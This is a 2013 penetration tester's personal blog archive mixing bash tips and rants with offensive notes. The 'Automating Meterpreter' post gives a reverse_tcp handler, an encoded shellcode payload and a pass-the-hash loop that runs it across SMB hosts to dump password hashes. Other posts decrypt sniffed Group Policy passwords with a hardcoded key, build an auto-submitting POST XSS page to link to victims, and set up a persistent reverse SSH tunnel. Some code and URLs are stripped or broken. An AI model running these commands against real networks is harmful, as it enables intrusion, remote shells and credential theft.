Monday, December 30, 2013

Ruby script to grab a fake name out of

require 'open-uri'
require 'nokogiri'

Nokogiri::HTML(open('')).xpath("//div[@class='address']/h3").collect {|node| puts node.text.strip}

Thursday, November 21, 2013

Burn Linux ISO image to USB drive on a Mac OSX

Ubuntu has a guide on doing it for ubuntu installs, but it should work just fine for the other distros:

I tested it with debian and it worked fine.

Tuesday, November 19, 2013

Legal advice for all you evil hackers

What to do in the case of a "knock and talk" by the police:

What to do if the police have a search warrant:

Monday, October 14, 2013

How to check if an IP from a domain is in a list of IPs

grep $(dig +short file-of-ips.txt
the +short parameter only returns the IP that the resolves to.

Friday, October 4, 2013


Stole this from some forum. just google it and you can find the source.

Frequency Note
0.5 - 1.8 MHz BC Band. AM Radio
1.8 - 30 MHz Shortwave Band.
30 - 78 MHz 6 Meter Ham
76 - 108 MHz FM Radio
108 - 137 MHz Air Band
137 - 174 MHz 144 MHz Ham. 2 Meter
174 - 222 MHz VHF-TV
222 - 225 MHz 222 MHz Ham
225 - 420 MHz General Band 1
420 - 470 MHz 440 MHz Ham. 70 cm.
470 - 800 MHz UHF-TV
800 - 999 MHz General Band 2 Cellular Blocked

50 - 54 MHz
144 - 148 MHz
222 - 225 MHz USA version only
430 - 440 MHz

TX w/ mod
50 - 54 MHz
144 - 148 MHz
148 - 174 MHz MARS/CAP Mod only
222 - 225 MHz USA version only
430 - 440 MHz
440 - 470 MHz MARS/CAP Mod only. FRS/GMRS freq range

Tuesday, September 17, 2013

Test allowed firewall ports

Sometimes you are behind some paywall/captive portal/firewall and you feel like certain pors would be left through if only you knew which of the over 65,000 ports did. The only way to really know is to check each one individually. Thats where comes in.

It's a site that registers every port as open. This way you know that if something is allowed through, it will come back in your port scan.

So behind your firewall, this:
nmap -p- -T4 -oA firewallcheck
now you can check the firewallcheck.nmap (or parse it out of gnmap) and find out which ports allow data through.

Wednesday, August 21, 2013

Number of Potential Ports in Private IP Space

So this is kind of interesting and it might be useful in the future.

The 10/8 network has 16,777,216 addresses

The 172.16/12 network has 1,048,576 addresses

The 192.168/16 network has 65,536 addresses

Combine those with 65,536 port numbers for TCP and the same for UDP and you get over 2.3 trillion (2,345,052,143,616) potential service endpoints.

So next time someone wants you to scan their private IP space, doesnt tell you what ranges there are and expects you to do it in 2 weeks, tell them to politely fuck off.

Thursday, August 15, 2013

echo colored text in bash

Lots of tutorials tell you to use the "echo -e [blahblah" ANSI escape sequences to generate the colors for output. First of all those are practically impossible to read easily, they look like magic, and its a bitch to try to find a typo.

tput was created a while ago to remedy those issues. I've created a function/script that can be included in other scripts to easily generate colors.
echo_color() {
 case ${1} in
  shift 1
  #echo $(COLOR)${user-supplied-text}$(NORMAL-COLOR)
  echo $(tput setaf 0)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 2)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 3)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 1)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 6)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 5)${*}$(tput sgr0)
  shift 1
  echo $(tput setaf 7)${*}$(tput sgr0)
  #yes i know its not a color, its still usefull though.
  shift 1
  echo $(tput setaf smul)${*}$(tput sgr0)
  shift 2
  echo $(tput setaf ${color_code})${*}$(tput sgr0)
  for i in $(seq 0 256); do 
  tput setaf ${i}
  printf " %3s" "$i"
  tput sgr0
  if [ $((($i + 1) % 16)) == 0 ] ; then
   echo #New line
  cat <
This script will echo your text as a specified color.

 $0 custom
 $0 ls-color-codes
echo_color $*
I'm particularly happy with my ls-color-codes argument, it will print a 16x16 box of the color codes and their colors.

Happy scripting!

Tuesday, August 13, 2013

Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...

Generate the post-exploitation comand rc file:

cat > /root/automsf.rc
run post/windows/gather/smart_hashdump
run post/windows/gather/cachedump

Then run msfconsole to listen for the callback:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set AutoRunScript multi_console_command -rc /root/automsf.rc
expoit -j -z
 Then generate the payload to use with sce:
msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 Then run the forloop while serving sce from a share
for i in `cat file-of-smb-hosts`; do 
echo grabbing $i; 
winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP

Tuesday, July 23, 2013

SSH Persistent Connection Script

I just reinstalled a test machine and forgot to save my ssh tunnel script so i decided to write a new one.

#this script will constantly maintain (via crontab) a remote forward connection to another machine. This can
#be used as a way to connect to a jumpbox to get over a pesky NAT


connect_string="ssh -N -T -R ${remote_listen_port}:localhost:${local_ssh_port} ${remote_user}@${remote_host} -i ${identity_file} -o ConnectTimeout=60 ServerAliveInterval=10"

 ps aux | grep "${connect_string}" | grep -v grep


if process_is_up ; then
 echo process is up, exiting
 exit 1
 echo process is down, starting now
 start_bot &
#add to root homedir and then crontab with the following line:
#* * * * * /root/ > /dev/null

Get/Set Fan Speeds for AMD Video Cards in Linux

I'm messing around with GPU cracking and I've been changing fan speeds manually a lot so I wrote a script to do it for me. This script will output the temperature & fan speed of the two cards in my system, as well as allow me to set the fan speeds for either/both:
#!/bin/bash - gives environmental stats about the ATI videocards. this assumes you have two cards
get_fan_speed () {
        aticonfig --pplib-cmd "get fanspeed 0" | grep '%' | cut -d ':' -f 3

set_fan_speed () {
        aticonfig --pplib-cmd "set fanspeed 0 ${2}"

get_temp () {
        aticonfig --adapter=${1} --odgt | grep Temp |cut -d '-' -f 2
if [[ -z ${1} ]]; then #if no arguments then output stats
        echo "0: $(get_temp 0) --$(get_fan_speed 0 )"
        echo "1: $(get_temp 1) --$(get_fan_speed 1 )"
        case ${1} in
                        get_fan_speed ${2}
                        oldspeed=$(get_fan_speed ${2})
                        set_fan_speed ${2} ${3}
                        echo "${2}: ${oldspeed} -> $(get_fan_speed ${2})"
                        oldspeed=$(get_fan_speed 0)
                        set_fan_speed 0 ${2}
                        echo "0: ${oldspeed} -> $(get_fan_speed 0)"
                        oldspeed=$(get_fan_speed 1)
                        set_fan_speed 1 ${2}
                        echo "1: ${oldspeed} -> $(get_fan_speed 1)"
                        echo "Usage: $0 [get Adapter_NUM | set Adapter_NUM fan_PERCENT | setboth fan_PERCENT]"

Wednesday, June 5, 2013

Getting Better At Bash Scripting

some people really suck at bash scripting. Some people are just lazy. I'm the latter. Often times i know whats best, i just dont care because it really doesnt matter in that particular situation...

Here are a couple sites that made me become the go-to person for bashisms and all the "why doesnt this work" bash questions.

The bash-hackers link is a frackin' gold mine.

Wednesday, May 29, 2013

Awk vs cut

The useless use of cat is an oft thrown around smack-on-the-hand for lots of noobies asking questions on forums.

This post is not about the useless use of cat, its about me being in a mood to nitpick about something i read on that page. If you go towards the "Gripes" section of the page you will see the following:

Frederick also remarks:

I disagree with your awk/cut comment, as I often use awk for everything and cut for nothing because the syntax for awk is so much cleaner for one liners and I don't have to RTFM so much.
I'll counter that awk is overkill, and you don't need to reread the cut manual after you've read it once or twice; that's my experience. Also cut much more clearly conveys to the reader what is going on -- a small awk script certainly should not take a lot of time to decode, but if you do it too quickly, there might be subtle points which are easy to miss. By contrast, cut doesn't have those subtleties, for better or for worse.

even when doing something as simple as printing out the second column of a line, cut and awk process the line in very importantly different ways: (and just cause i'm an ass, i'll use cat uselessly)

$ cat file
word1 word2 word3
blah1 blah2 blah3

$ cat file | cut -d ' ' -f 2

$ cat file | awk '{print $2}'

So let's see here why the cut command sucks balls. Lets add a SINGLE SPACE ANYWHERE between the words. In this case, between word1 and word2:

$ cat file
word1 word2 word3
blah1 blah2 blah3

Now, lets run both cut and awk commands again, starting with awk this time:

$ cat file | awk '{print $2}'

ok, works like someone would expect it to...what about cut?
$ cat file | cut -d ' ' -f 2


WTF? yeah, screw you cut. awk ftw

awk is smarter than cut when it comes to recognizing where the "words" are. Cut just looks at the input and thinks that is goes like this:


so unless you ABSOLUTELY KNOW your input is formatted correctly, use awk instead of cut. its safer

Monday, May 6, 2013

Get list of AD Domain Controllers from DNS records

I used to be dumb and find it annoying to get the list of DCs that I would target in a pentest. Apparently its super easy to get them from DNS records.

nslookup -type=srv
replace with whatever the actual domain is. If you are using the internal DNS servers, you can typically just do a "nslookup -r" to get the FQDN of the machine. That usually provides you with the "" part.


Other ways i've found that work:

If you have shell access:
netdom query /D:DOMAINNAME DC
net view /domain
nltest /dsgetdc:DOMAINNAME

Wednesday, April 10, 2013

Monday, April 8, 2013

Learning to Hack - Vulnerable Testbeds

There are a crap ton of vulnerable testbeds to educate the interested in how applications/operatings systems get hacked. I'll update this list as I come across them:


Recently found these links on reddit for Capture The Flag challenges:

Monday, March 18, 2013

Download ShmooCon 2013 Videos

ShmooCon released their videos on their website for everyone to download.

wget -i <(cat <<EOF 2013 - Opening Remarks & Rants.mp4 2013 - How to Own a Building BacNET Attack Framework.mp4 2013 - Mainframed The Secrets Inside that Black Box.mp4 2013 - WIPE THE DRIVE - Techniques for Malware Persistence.mp4 2013 - Apple iOS Certificate Tomfoolery.mp4 2013 - Hide and Seek, Post-Exploitation Style.mp4 2013 - Hackers get Schooled Learning Lessons from Academia.mp4 2013 - Friday Fire Talks.mp4 2013 - Running a CTF - Panel on the Art of Hacker Gaming.mp4 2013 - C10M Defending The Internet At Scale.mp4 2013 - Paparazzi Over IP.mp4 2013 - DIY Using Trust to Secure Embedded Projects.mp4 2013 - Moloch A New And Free Way To Index Your Packet Capture Repository-1.mp4 2013 - OpenStack Security Brief.mp4 2013 - Generalized Single Packet Auth for Cloud Envions.mp4 2013 - From Shotgun Parsers to Better Software Stacks.mp4 2013 - The Computer Fraud and Abuse Act Swartz, Auernheimer, and Beyond.mp4 2013 - Malware Analysis Collaboration Automation & Training.mp4 2013 - Bright Shiny Things Intelligent DA Control.mp4 2013 - Strategies of a World Class Security Inciden.mp4 2013 - Armoring Your Android Apps.mp4 2013 - Protecting Sensitive Information on iOS Devices.mp4 2013 - Beyond Nymwars - Online Identity Battle.mp4 2013 - How Smart Is BlueTooth Smart.mp4 2013 - Chopshop Busting the Gh0st.mp4 2013 - The Cloud - Storms on the Horizon.mp4 2013 - 0wn The Con.mp4 2013 - PunkSPIDER Open Source Fuzzing Proj Tgting the Internet.mp4 2013 - Crypto - Youre Doing It Wrong.mp4 2013 - Identity Based Internet Protocol.mp4 2013 - NSM and more with Bro Network Monitor.mp4 2013 - These Go To Eleven - When the Law Goes Too Far.mp4 2013 - Forensics - ExFat Bastardized for Cameras.mp4 2013 - Page Fault Liberation Army or Better Security Through Trapping.mp4 2013 - Hacking as an Act of War.mp4 2013 - MASTIFF - Automated Static Analysis Framewor.mp4 2013 - Attacking SCADA Wireless Systems.mp4 2013 - Ka-Ching - How to Make Real Money.mp4 2013 - Is Practical Info Sharing Possible.mp4

You can copy and paste that into your terminal and it will download the videos to that directory.

Friday, March 8, 2013

Tmux screen logging workaround

I really like tmux, its sexy, sleek, actively developed, and has amazing mouse support. I only had one problem (so far) with the transition from GNU screen: output logging.

GNU screen has an amazing config option that I used almost all the time:

logfile screenlogs/%S%Y%m%d-%n.log
deflog on

The problem is that tmux doesnt have the same option :( the closest thing I have seen is the "pipe-pane" option, but I couldnt find any way to automate that upon startup of tmux. I figured, well since tmux doesnt let me do it, maybe I can hack something together myself. And thats exactly what i did. I give to you...tmux output logging via the script command:
if [[ $TERM = "screen" ]] && [[ $(ps $PPID -o comm=) = "tmux" ]] ; then
logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
mkdir $HOME/logs 2> /dev/null
script -t 1 $HOME/logs/${logname} bash -login
The above code basically checks if the $TERM variable is set to "screen" (tmux does this by default) and then check if the parent PID's name is "tmux". then it sets up a logging environment and output everything to the logfile it specifies.

That code works for OSX, for your basic GNU linux setup try this instead:

if [[ $TERM = "screen" ]] && [[ $(ps -p $PPID -o comm=) = "tmux" ]]; then
logname="$(date '+%d.%m.%Y_%H:%M:%S').tmux.log"
mkdir $HOME/logs 2> /dev/null
script -f $HOME/logs/${logname}

All you have to do is put that code into your .profile or .bashrc/.bash_profile and you are good to go.


Sunday, March 3, 2013

Bash script to sniff, parse, and decrypt cpassword's from GPOs

echo -n "$1" | grep -o -P 'runAs=".*?"'| cut -d'"' -f 2
echo -n "$1" | grep -o -P 'cpassword=".*?"'| cut -d'"' -f 2
pad_length=$(expr 4 - length "${cpassword}" % 4) # figure out the padding length
padding=$(for i in {1..${pad_length}}; do printf =; done) #output correct padding string
#pad, b64 decode, then decrypt the password
echo $(echo -n ${cpassword}${padding} | base64 -d | openssl aes-256-cbc -d -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv '')

tshark -R 'smb.cmd==0x2e and tcp contains 'cpassword'' -Tfields -e smb.file_data \
| xxd -r -p | grep cpassword \
| while read line; do \
echo $(parse_username "$line"):$(decrypt_cpassword $(parse_cpassword "$line"));

Figlet Fonts

These seems to be the least retarded....


figlet -f stop KITTENS

Wednesday, February 27, 2013

The Best USB WiFi Adapter for Pentests

I've spent a couple days researching what is the best USB wifi adapter to use in wireless penetration tests/site surveys.

If you are only concerned about the 2.4ghz spectrum than the widely suggested ALFA AWUS036H is still the best and works flawlessly out of the box.

The problem arises when you are trying to encompass both 2.4 and 5ghz ranges. I'll save you the rant about my search for the right device and i'll just give it to you here:

The only Dual Band (2.4/5ghz) USB adapter that works out of the box with everything including WPS cracking (reaver) that you can currently buy is the Ubiquiti SR71 USB Adapter. It comes up as the carl9170 driver in BT5r3.

Hopefully this saves you the days it took me to figure out which one is the best.

After some extensive testing i've noticed that it sometimes has a problem with WPS cracking and can be a bit finicky with the drivers. The ALFA AWUS036H still works flawlessly. I'm going to be testing more and more devices and will report when i have something.

Monday, February 11, 2013

Exploiting POST Based XSS

Found this on the web somewhere and wanted to post it here to have a place to reference it. place the actual XSS in the "abcd" section and place it on a webserver somwhere. Bitly link the exploit code to your target and have it execute.
<body onload=”xss();”>
<form method=post name=f action=””>
<input name=”abcd” value=”<SCRIPT>alert(’XSS’)</SCRIPT>”>
<input type=”submit” class=”button” name=”s”>
function xss() {;

Tuesday, February 5, 2013

Using Nmap Output in Nikto

Nikto can read/parse nmap output to supply a list of hosts and ports to scan:

nikto -h nmap_scan.gnmap

This will make nikto read the gnmap file, pull out the hostnames and port numbers and start scanning. It really handy versus manually grepping out entries to scan.

Monday, February 4, 2013

Base64 Encoding and the Stupid Things Developers Do

Base64 encoding is everywhere. It the #1 data encoding type used on the internet. Even though it technically increases the size of the data by 33% its still used in spaces where speed is of the utmost importance.

Mainly because of two reasons. Its ubiquitous  and it was meant to be used to transmit non ascii data in ascii only systems. Base64 was originally designed as a method to transmit binary information through plaintext channels such as attachments on emails. Email is still plaintext, so anything thats not plaintext needs to be represented differently or else the email servers/clients would barf upon reading it.

Where the Problem Lay:
The problem is when developers dont truly understand the concepts of encoding and mentally group it into the same category as encryption. ENCODING IS NOT ENCRYPTION and dont let anyone tell you otherwise. Changing the location of the secret base from english to spanish does not protect the location from the enemy. It's especially annoying when someone tries to back up the argument of encoding as encryption by saying something like "well if they dont speak spanish then its just as good". No, its not. Because that not security, thats obfuscation  All i have to do is find someone who speaks spanish and the game is over. I used to think that if you used a encoding type nobody has ever seen before than maybe thats moving into the security category, but unfortunately its not. This is because that requires a massive underestimation of the ability of people to obsess over puzzles. Just dont do it, its really not that hard...

So, if you have sensitive information (passwords, credit cards, SSNs, keys, etc) and you only base64 encode them, then you are sending them cleartext. Every developer should consider base64 encoding as the equivalent security as plaintext, because in the end, it is.

Bash Caveat - It's all just text

 This is an important thing to consider when writing Bash scripts. In my experience its not necessarily the little command tricks that you know that make you a better coder, it’s the underlying understanding of how things work.

You’re dealing with Text
Mentally keeping track of the contents of variables, or whats being passed in a pipe is actually rather simple in Bash. Everything is a string. There is no fancy Object oriented concepts that you have to consider when dealing with data. It’s all just text. Take the following for example:

Cat file | cut –f1 | sort –u | wc –l

While the above follows under the category of “useless use of cat” it’s done to illustrate a point. You are taking the text output of a command and passing it as the text input of another command. THAT’S IT. The “target” program that you pass the data to has its own rules on how to deal with the text. In the above case what is happening is cat is opening the file, outputting the contents of the file as the input for the cut command, which reads in the text, and (due to –f1) outputs the first tab delimited field as output. This output text is being passed directly to the sort command which will alphabetically sort the list and eliminate the duplicates (-u). Sort then outputs this text, and the pipe (again) takes the output and sends it to wc which will count how many lines (-l) and output the result.

The only thing programs like this are designed to do is mangle/modify/analyze text in some way.

The nice thing about only dealing with text is that you can see its state/contents at any point, simply by outputting it to the screen.

I believe that keeping in mind you are only dealing with strings of text is one of the most important considerations to remember when writing bash scripts. 

The other good thing about the "everything is a string" philosophy is that you can tell which programs where built for scripting and which were mainly built for human consumption. The main question you have to ask is: How much parsing of text do i have to do to get some simple data out? If the answer is "a lot", then you may want to search for another tool/program that is more API-esque focused.

Saturday, January 26, 2013

Rant: OSX Find Clipboard - Invokes Baby Punching

OSX has multiple clipboards that allow you to do fairly user friendly actions such as drag and drop various files, fonts, text, etc. Among these clipboards is the global "Find Pasteboard". This has been by far the stupidest and more shortsighted idea i have ever seen implemented by apple.

At first it seems like a great idea, select text somewhere, hit cmd+e and search for it in a completely separate application just by hitting cmd+g. I'm sure certain people find that very useful. But there is a problem with this. A problem that makes me want to punch babies.

For example:
if you search for text in chrome on a webpage, and you switch to sublime text 2 to search for something in your code, it automatically inputs the text that you typed into chrome, into the sublime "find" box. ok...thats odd, i'll just backspace and start typing my search. Ah damn, i forgot the syntax to that one perl regex. When you switch back to chrome to search the page, IT COMPLETELY WIPES OUT/REPLACES YOUR SEARCH IN SUBLIME. so that big long regex i was typing in sublime? gone. Thanks apple, your "feature" wiped out the last 30 minutes of research i was doing. this is the type of thing that creates serial killers.

The absolute worst part about all of it, the part where apple's arrogance and unbelievable big head ruins everything, is in the fact that THERE IS NO WAY TO DISABLE IT. AT ALL. ZILCH. NADA. They simply say that "this is intended behavior" which is the equivalent of them giving you the finger and saying "deal with it".

The entire idea of the find clipboard itself is stupid. It's a feature thats hardly known, and much more likely to cause frustration and issues than the problems it solves. The probability that you need to search for two different strings in different applications is obscenely higher than the few situations in which you want to search text from one app in another.

I'm not saying take this feature out, as i'm sure someone might be using it, i'm simply asking for a way to disable it.

This issue is more evidence of what i believe to be apple's worst quality, the arrogance of their imposed "user experience" on the consumer. I'm done with apple, this issue is on top of the dozens of other things that have driven me mad by them. I'm doing back to linux. At least then i have %100 control over my computer.

Thursday, January 24, 2013

Barracuda SSH Backdoors

Today i learned of an advisory posted on reddit regarding Barracuda and certain "support" ssh backdoors installed on many of their products. Unfortunately i dont have a Barracuda product to test the specific attack strings on, but i have been able to gather quite a bit of information on it:

Here is the reddit netsec article on it:

Here is the Neohapsis copypasta from SEC-consult:

Here is the original advisory:

Barracuda released several "tech alerts" about this vuln:

Here is a full disclosure post in 2011 where someone suspected Barracuda had a backdoor (for lolz)

Here is a blog post from 2009 (seriously) of a guy that got root access from the console and revealed overlapping details about the advisory:

Summary of the situation:
The following products:
     Barracuda Spam and Virus Firewall
     Barracuda Web Filter
     Barracuda Message Archiver
     Barracuda Web Application Firewall
     Barracuda Link Balancer
     Barracuda Load Balancer
     Barracuda SSL VPN
     (all including their respective virtual "Vx" versions)
vulnerable version: all versions less than Security Definition 2.0.5

All have preinstalled (undocumented) support accounts with SSH access in /etc/passwd.
The "product" support account drops you to shell without requiring SSH keys. Which also has access to the MySQL database that can modify the list of users who can log in...

Only hosts coming from certain IPs can access this ssh daemon:

There are certain reports that the "product" user requires no password.

If anyone can get me the user hashes, i can run it through my (pretty big/extensive) wordlists with rulesets.

Tuesday, January 22, 2013

Edit Text Without Using Files

Lots of times on engagements i'll have to take a big chunk of data, for example user credentials, and parse/format them a particular way. Typically it can be done quickly by placing the text into a small temp file, and then parsing the contents that way.

The problem is that you are then left with a bunch of crap files you dont need. Granted, i could just put everything in the /tmp folder, or create another temp folder alltogether, but i didnt want to have to deal with files at all.

In come here documents. Here documents are awesome for stuff like this. Take this example:

cat <<EOFMEOW | awk '{print $3}'


Now all i need to do is just paste the text once it spits back the '>' prompt.

Wednesday, January 16, 2013

Windows Network Service Internals - IPC/RPC

Here are the core MSRPC functions/capabilities. It includes things like interacting with the SAM, the registry, the event log, the service control manager and much more:

Saturday, January 5, 2013

Pentest Bookmarks - Single Links

Here is a list of the pentest-bookmarks grabbed from
I needed to parse them for a project, so i modified it to be a one-line-per-link format. I figured someone else might be able to use it for something so I'm posting it here.

EDIT: here is the line i used:

grep -E -o '<A HREF=\"http.*?\"' <(curl | sort -u | cut -d \" -f 2,33903,com_smf/Itemid,54/topic,6131.msg32678/#msg32678,com_smf/Itemid,54/topic,6158.0/